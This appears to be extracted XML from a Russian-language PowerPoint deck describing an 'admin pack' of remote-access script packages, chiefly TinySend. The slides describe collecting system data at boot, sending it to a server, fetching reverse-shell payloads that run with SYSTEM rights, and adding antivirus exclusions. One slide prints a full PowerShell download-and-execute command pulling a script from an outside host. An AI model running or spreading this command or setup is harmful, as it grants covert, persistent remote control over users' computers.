              <a:t>Обратные прокси, некоторые специализированные </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GUI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>клиенты. Инструменты могут опознаваться как вирусы (их надо добавлять в исключения антивируса).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Распространение инструментов происходит при помощи загрузочных скриптов.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28535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37C97D-A10D-BB73-C43A-F7A7306E4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Скрипты установки удалённого доступа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FBFBEF-1E84-5CF2-ED68-CC19E3E25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 качестве скриптов доставки продуктов удалённого доступа используются следующие скрипты и пакеты скриптов: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TinySend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RemoteMonitoring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NIT Scheduled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Run Scheduler Folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Данные пакеты скриптов устанавливаются во время или после установки основных пакетов админ-пака.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1608597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D2AC0F-0624-E1D3-9F13-4236F3770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Пакет </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>TinySend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413A2BA-27B8-3AD1-F86B-BA6807E1A6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Описание</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="897447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290073-D1B6-1265-4D83-50B11ED50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TinySend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Общие сведения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671527-8A2E-EADC-4D9F-CF7DB8634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Пакет </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>TinySend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>устанавливается в середине установки пакетов админ-пака, после установки исключений антивируса, брандмауэра и  архиваторов.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Данный пакет является обязательным, он не может быть исключён из установки, но может быть впоследствии дезактивирован.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355313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72D863-1EDB-212B-0586-E3D0680E1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TinySend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>принципы работы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54F0FC-58BC-F5A0-E4F0-AB8294D76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Данный набор скриптов работает после включения и инициализации пользователя компьютера (до его входа в систему).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Скрипты собирают данные о компьютере пользователя и его операционной системе при старте, а потом отправляют данные на сервер </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NIT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Взамен, с сервера </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, загружается и выполняется файл, содержащий возможности загрузки, установки или удаления и запуска полезных нагрузок с реверс-шелл.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Оболочки удалённого доступа работают с правами системы.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1252465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8CA29B-58AD-34B6-08FE-CE557E068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Команда установки </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>TinySend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A1227B-2FCB-AE49-1702-F62277A9D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ighlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t> = New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>;$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>wc.DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>("http://lin.netip4.ru:18080/~vagrant/PROGS/LIB-RUN/PS1/nit.new-tinysend.ps1", "$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>env:UserProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>\nit.new-tinysend.ps1"); &amp; $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>env:UserProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>\nit.new-tinysend.ps1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Данная команда выполняется в командной строке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>запущенной с повышенными привилегиями.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Предварительно в системе должны быть установлены исключения антивируса.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4255089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CDF7F4-8833-7A71-3F50-930E519E3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Пакет </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote Monitoring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10B1B7-9B29-4851-B3CA-65DDEEA0AD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Описание</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1212170580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{76738850-C515-4170-8A8C-289958DC0B5A}TF6e1c0bd6-43b7-4cba-aa12-42a64460605493cc7547-c3a80a76487d</Template>
  <TotalTime>125</TotalTime>
  <Words>1036</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Широкоэкранный</PresentationFormat>
  <Paragraphs>100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Trebuchet MS</vt:lpstr>
      <vt:lpstr>Берлин</vt:lpstr>
      <vt:lpstr>Продукция NIT</vt:lpstr>
      <vt:lpstr>Организация удалённого доступа</vt:lpstr>
      <vt:lpstr>Общие сведения</vt:lpstr>
      <vt:lpstr>Скрипты установки удалённого доступа</vt:lpstr>
      <vt:lpstr>Пакет TinySend</vt:lpstr>
      <vt:lpstr>TinySend Общие сведения</vt:lpstr>
      <vt:lpstr>TinySend: принципы работы</vt:lpstr>
      <vt:lpstr>Команда установки TinySend</vt:lpstr>
      <vt:lpstr>Пакет Remote Monitoring</vt:lpstr>
      <vt:lpstr>Remote Monitoring: сведения</vt:lpstr>
      <vt:lpstr>Remote Monitoring: принципы работы</vt:lpstr>
      <vt:lpstr>Установка пакета Remote Monitoring</vt:lpstr>
      <vt:lpstr>Пакет NIT Scheduled</vt:lpstr>
      <vt:lpstr>NIT Scheduled: описание</vt:lpstr>
      <vt:lpstr>Установка пакета NIT Scheduler</vt:lpstr>
      <vt:lpstr>Пакет Run Scheduler Folder</vt:lpstr>
      <vt:lpstr>Run Scheduler Folder: принципы</vt:lpstr>
      <vt:lpstr>Установка программы Run Scheduler Folder</vt:lpstr>
      <vt:lpstr>Приложения</vt:lpstr>
      <vt:lpstr>Приложение: собираемые данные</vt:lpstr>
      <vt:lpstr>Приложение: загружаемые инструменты</vt:lpstr>
      <vt:lpstr>Приложение: интервалы планировщика</vt:lpstr>
      <vt:lpstr>Run Scheduled Folder: файлы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Пётр Тенькаев</dc:creator>
  <cp:lastModifiedBy>Пётр Тенькаев</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-27T19:52:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-28T10:55:11Z</dcterms:modified>
</cp:coreProperties>
</file>